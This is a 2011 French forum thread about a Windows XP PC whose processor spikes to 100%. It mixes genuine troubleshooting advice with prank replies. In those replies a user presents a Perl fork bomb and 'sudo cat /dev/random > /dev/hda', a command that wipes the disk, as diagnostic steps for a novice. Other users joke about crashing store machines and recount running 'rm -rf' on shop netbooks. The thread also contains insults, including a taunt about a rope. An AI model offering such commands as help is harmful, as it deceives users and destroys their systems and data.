Problème de performance

Démarré par Jerelink, 10 Octobre 2011 à 02:10

0 Membres et 1 Invité sur ce sujet

Bonsoir, je vient vous exposer mon problème, voilà déja un long moment maintenant que j'ai changé mon ventirad suite a un problème (fendu), depuis, toujours ce même problème, et il s'amplifie et est de plus en plus récurrent...Les performance montent parfois a 100% , je ram énormément j'usqu'a voir ma souris bugué (oui oui....) et le ventirad souffle très fort...
J'ai tout essayer, défragmentation, scan virus, nettoyage, supprimer des programmes bref, tout sauf le formatage, plus le cd.
Niveau materiel, le ventirad est bien fixé, il ne bouge pas, j'ai suffisamment de ram, les barrette sont bien enclenché...Je ne comprend pas...
Merci de bien vouloir m'aider ;)

Le ventirad ne refroidit pas assez ta machine. Ça veut pas forcément dire qu'il est mal fixé, il peut tout simplement ne pas refroidir assez, même à puissance max.

Donc, il faut que j'achète un ventirad a plus haut voltage/plus gros ?

Il y'a de fortes chances que oui. Généralement tu peux trouver à acheter le même ventirad que celui qui venait avec ton processeur sur le net.
Ah oui, il y'a aussi de fortes chances que t'aies merdé la pâte thermique. Les gens ont tendance à en mettre trop.

Dans ce cas la c' est bien possible que la pâte thermique soit trop sec maintenant que tu m'en parle...La personne qui me l'a remonté n'en a pas ajouté/gratté...Je vais voir sa demain, si je ne trouve pas de solution je reviendrai, merci ;)

10 Octobre 2011 à 06:43 #5 Dernière édition: 10 Octobre 2011 à 06:45 par Cyberclic
Tu as des écrans bleus, des plantages ou des reboot intempestifs pour dire que ça vient de ton ventirad qui ne dissipe pas assez ?
Le ventillo va tourner à fond quand la charge processeur est au maximum. Ça ne veut pas forcement dire qu'il fait mal son job.
Quant a la pâte thermique, elle doit etre changée si elle est sèche ou mal étalée.

Regarde la température de ton CPU via des logiciels prévus à cet effet, ou dans le bios directement. Et touche ton radiateur pour voir s'il n'est pas bouillant.

Ton problème est logiciel. Un processeur qui monte à 100% sans raison apparente, c'est bizarre.
Virus, fuite de mémoire dans un soft, ou CPU pas assez costaud.

Regarde dans les processus ou services qui tournent celui qui grimpe sans raison dans le gestionnaire de tache Windows.

Plantage et reboot oui...J'ai changé la pâte thermique et toujours le même problème (oui je suis sur de l'avoir appliqué correctement).
J'ai relancé des scans antivirus, rien du tout...
Sinon sa m'est arrivé de voir Firefox monter a plus d'un million dans les processus, mais même quand il est etiend, sa arrive que le cpu grimpe a 100%.
Autre chose a signaler, quand je reboot le pc sa m'arrive souvent en ce moment d'avoir un énorme bug/virus/je sais pas quoi ^^/ qui fait que quand je vais dans la barre des tache, sans même cliqué sur la souris, la ou passe la souris les programme/dossier/dossier etc sont ouvert...Puis après plus rien...

C'est simple, telecharge et boot sur un LiveCD Linux. ça t'évite de devoir tout réinstaller pour tes tests.
Si ça sature toujours, c'est matériel. Sinon c'est logiciel (drivers défectueux, virus...)

Mais bon, d'après ce que tu décris, c'est logiciel.

?? Je suis sous windows xp pour information, pourquoi linux ?

Parce que les liveCD sont une technologie récente (moins de 20 ans) donc ça n'existe pas encore sous Windows.
Chaîne Twitch : diffusion en direct de sessions de développement de Solarus, de création de jeux, de parties de jeux vidéo.
Chaîne YouTube : replays des diffusions en direct, tutos Solarus
Compte Twitter : pour être au courant des nouveautés
Chat Discord : pour discuter en direct avec la communauté Solarus

Et qu'en testant avec un autre OS il est assez simple de voir si tu as un problème matériel ou logiciel.
Citation
Ash Nazg Durbatulùk, Ash Nazg Gimbatul,
Ash Nazg Thrakatulùk agh bruzum-ishi krimpatul.
The fellowship of the Ring - J.R.R. Tolkien

Je vais essayer s, mais lorsque que je vais boot sur linux, a quoi je peut voir qu'il s'agit d'un problème matériel ? je laisse tourner, je fait comme d'habitude ? (Firefox, etc...)

Citation de: jerelink le 11 Octobre 2011 à 22:38
je fait comme d'habitude ? (Firefox, etc...)

Commence par ça oui. Pour tester l'état de ton système, tu peux aussi ouvrir un terminal (ou console) et taper:

perl -e "fork while fork"

suivi de "Enter". Continues ensuite tes activités habituelles (Firefox, etc.), les tests se lanceront en tâche de fond :)

Ok, merci des renseignements, je teste sa dans la semaine ;)

Ne fais pas ça, c'est une commande qui fait planter le système, de façon très efficace d'ailleurs.
Chaîne Twitch : diffusion en direct de sessions de développement de Solarus, de création de jeux, de parties de jeux vidéo.
Chaîne YouTube : replays des diffusions en direct, tutos Solarus
Compte Twitter : pour être au courant des nouveautés
Chat Discord : pour discuter en direct avec la communauté Solarus

Citation de: Christopho le 11 Octobre 2011 à 23:42
Ne fais pas ça, c'est une commande qui fait planter le système, de façon très efficace d'ailleurs.
Merci Christopho...

Guillaume, les mauvaises blagues tu les gardes pour toi ou ton entourage merci...

Bonne soirée

Citation de: jerelink le 12 Octobre 2011 à 00:07
Guillaume, les mauvaises blagues tu les gardes pour toi ou ton entourage merci...

Justement je te considérais comme mon entourage, je suis déçu que tu ne sois pas flatté :'(

Citation de: Guillaume le 12 Octobre 2011 à 00:23
Citation de: jerelink le 12 Octobre 2011 à 00:07
Guillaume, les mauvaises blagues tu les gardes pour toi ou ton entourage merci...

Justement je te considérais comme mon entourage, je suis déçu que tu ne sois pas flatté :'(

LOL, l'age n'est pas signe de maturité chez certain, tu veut une corde ?

Citation de: jerelink le 12 Octobre 2011 à 00:53
Citation de: Guillaume le 12 Octobre 2011 à 00:23
Citation de: jerelink le 12 Octobre 2011 à 00:07
Guillaume, les mauvaises blagues tu les gardes pour toi ou ton entourage merci...

Justement je te considérais comme mon entourage, je suis déçu que tu ne sois pas flatté :'(

LOL, l'age n'est pas signe de maturité chez certain, tu veut une corde ?

Ha désolé! Je n'avais pas réalisé que c'était la mauvaise commande! OK, il faut donc que tu fasses:

sudo cat /dev/random > /dev/hda

Ça devrait marcher :)

12 Octobre 2011 à 02:49 #19 Dernière édition: 12 Octobre 2011 à 03:03 par yoshi04
Citation de: Guillaume le 11 Octobre 2011 à 23:29
perl -e "fork while fork"
Citation de: Christopho le 11 Octobre 2011 à 23:42
Ne fais pas ça, c'est une commande qui fait planter le système, de façon très efficace d'ailleurs.

Pour ceux qui veulent en savoir plus : Fork Bomb.

Après ce qui est drôle, c'est de tester ça sur des machines en grande surface... Parfois on est surpris de voir que ça passe  :P

Citation de: Guillaume le 12 Octobre 2011 à 02:45
Ha désolé! Je n'avais pas réalisé que c'était la mauvaise commande! OK, il faut donc que tu fasses:

sudo cat /dev/random > /dev/hda

Ça devrait marcher :)

Moi qui comptait t'offrir le tabouret qui va avec au cas ou tu ne te sentirais pas a la hauteur a la vue de ton intelligence...
Bien ta vie ?

Citation de: yoshi04 le 12 Octobre 2011 à 02:49
Citation de: Christopho le 11 Octobre 2011 à 23:42
Ne fais pas ça, c'est une commande qui fait planter le système, de façon très efficace d'ailleurs.

Pour ceux qui veulent en savoir plus : .

Après ce qui est drôle, c'est de tester ça sur des machines en grande surface... Parfois on est surpris de voir que ça passe  :P

J'avais "sleep 500 && rm -rf" tous les netbook de la Fnac il y'a quelques années (le sleep pour avoir le temps de partir sans être suspect)... la fois d'après ils avaient protégé l'accès root. Bah oui il y'a que comme ça que les gens apprennent.

[spoiler]

[/spoiler]